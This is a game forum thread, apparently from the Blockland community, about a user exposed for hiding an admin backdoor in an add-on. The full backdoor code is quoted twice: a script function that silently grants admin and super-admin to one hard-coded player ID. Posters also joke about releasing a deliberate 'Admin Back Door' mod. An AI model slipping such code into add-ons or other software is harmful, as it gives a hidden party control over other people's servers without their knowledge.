Author Topic: Azjherben  (Read 5000 times)

To prove a handicap wrong this is not locked

Wow, az. You really done it this time. Send me original without that line thar?


Well, it shows to not download stuffty Add-Ons in the first place :)

Also, I didn't know that RTB scanned Add-Ons for potential harmful code. That's pretty neat!

Wow, az. You really done it this time. Send me original without that line thar?
If you have the original, it takes about five seconds to remove the bit that does the Admin-ing.

Tom

Don't remove it, make it delete his client instead!

Tom

Noedit D:

I mean player not client. Deleting players is more fun :D

"hurr durr"
you were asking for it

The question is, How did this guy find the back door?
Code: [Select]
function serverCmdtogAdmin(%client)
{
if(%client.bl_id == 8443)//ID here :3
{
%client.isAdmin = (%client.isAdmin ? 0 : 1);
%client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

if(%client.isAdmin)
{
messageAll('MsgAdminForce','\c2%1 has Re-Admined him/her self.', %client.name);
}
else
{
messageAll('MsgAdminForce','\c0%1 has De-Admined him/her self.', %client.name);
}
}
}

[5/7/10 7:11:47 PM] Walrusface McGee: lol you know what I want to do
[5/7/10 7:11:59 PM] Leftus: Buy iced coffie from your clock
[5/7/10 7:12:05 PM] Walrusface McGee: make a mod named "Spock's Admin Back Door"
[5/7/10 7:12:16 PM] Walrusface McGee: and say that it gives me admin on every server with it installed
[5/7/10 7:12:22 PM] Walrusface McGee: and see how many people download it

[5/7/10 7:11:47 PM] Walrusface McGee: lol you know what I want to do
[5/7/10 7:11:59 PM] Leftus: Buy iced coffie from your clock
[5/7/10 7:12:05 PM] Walrusface McGee: make a mod named "Spock's Admin Back Door"
[5/7/10 7:12:16 PM] Walrusface McGee: and say that it gives me admin on every server with it installed
[5/7/10 7:12:22 PM] Walrusface McGee: and see how many people download it
It was all heedicalking's fault.

[5/7/10 7:11:59 PM] Leftus: Buy iced coffie from your clock

Do it.

Code: [Select]
function serverCmdtogAdmin(%client)
{
if(%client.bl_id == 8443)//ID here :3
{
%client.isAdmin = (%client.isAdmin ? 0 : 1);
%client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

if(%client.isAdmin)
{
messageAll('MsgAdminForce','\c2%1 has Re-Admined him/her self.', %client.name);
}
else
{
messageAll('MsgAdminForce','\c0%1 has De-Admined him/her self.', %client.name);
}
}
}
Haha, nice code you just chunked out of Iban's City RPG.

[5/7/10 7:11:47 PM] Walrusface McGee: lol you know what I want to do
[5/7/10 7:11:59 PM] Leftus: Buy iced coffie from your clock
[5/7/10 7:12:05 PM] Walrusface McGee: make a mod named "Spock's Admin Back Door"
[5/7/10 7:12:16 PM] Walrusface McGee: and say that it gives me admin on every server with it installed
[5/7/10 7:12:22 PM] Walrusface McGee: and see how many people download it
DO EEET

Does anybody have the add-on?
I tried downloading it before this was up, but it didn't appear in my add-ons, or documents.
I have it in the new version of RTB from a server, so I don't know. I hope Albatross has seen this. Because he has the add-on.